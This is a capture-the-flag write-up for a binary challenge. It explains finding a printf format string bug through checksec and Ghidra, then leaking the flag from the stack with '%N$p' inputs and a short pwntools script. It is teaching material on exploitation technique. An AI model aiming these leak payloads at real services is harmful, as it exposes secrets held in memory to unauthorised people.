Binary Exploitation (pwn)

Pwnterpolations

First step is to check the binary information using file and the protections used in compilation using checksec

Now I've highlighted 3 main parts, these are usually the parts we wanna try to focus on in the file output feel free to do some research on what each part means.

Nothing interesting here, no canary, no PIE and Partial RELRO, could be anything except shellcode injection since NX is enabled.

We're given an ELF binary, after decompiling the binary using ghidra, we find the following code:

Analyzing the code, we find that the flag is imported into the binary and stored into a variable, then uses fgets to take the user input, and prints that input using printf

One thing we know is the following:

• This isnt a shellcode injection for the reason stated above

• This isnt a ret2win challenge, since there isn't a stack overflow vulnerability with the usage of fgets and specifying the exact amount of bytes to be taken.

let's see how ChatGPT does with our analysis.

If we ask ChatGPT for further explanation or do some reading on format string vulnerabilities, we'll find that we can leak variables off the stack using such vulnerability.

if we try out the vulnerability, we see that we're leaking addresses off the stack, and we know that the variables in this program are stored on the stack, let's keep leaking until we find something weird.

After leaking a few positions on the stack we find that position 8 is a little interesting.

This is too long to be an address (addresses are either 4 bytes for 32-bit systems or 8 bytes for 64-bit systems), then this must be the content of a variable, let's try decoding it using cyberchef

of course knowing it's running on little endian we have to swap endianess then decode from hex:

Hmm interesting, this is the start of the flag format...

After leaking the positions that follow 8 (9,10,11) and doing the same we see more of the flag is showing up:

Keep doing this and you'll get your flag :)

Of course this is peasantry...

Now let's stop with the peasant ways and solve the challenge with a script, here's a script that solves our challenge in a cooler manner:

from pwn import *
from pwnlib.util.packing import *

context.binary = binary = ELF("./chall")
context.log_level = "error"

p = process()

p.recvuntil(b'> ')
for i in range(8,13):
    p.sendline(f'%{i}$p'.encode())
    out = p.recvline().strip().decode()
    out = p64(int(out[2:],16)).decode()
    print(out,end='')

p.close()    

# for i in range(1,40):
# 	p = process()
# 	p.recvuntil(b"> ")
# 	tst = f'%{i}$p'
# 	p.sendline(tst.encode())
# 	out = p.recvline().strip().decode()
# 	p.recvuntil(b"> ")
# 	try:
# 		print(i, (p64(int(out,16))))
# 	except:
# 		continue
# 	p.close()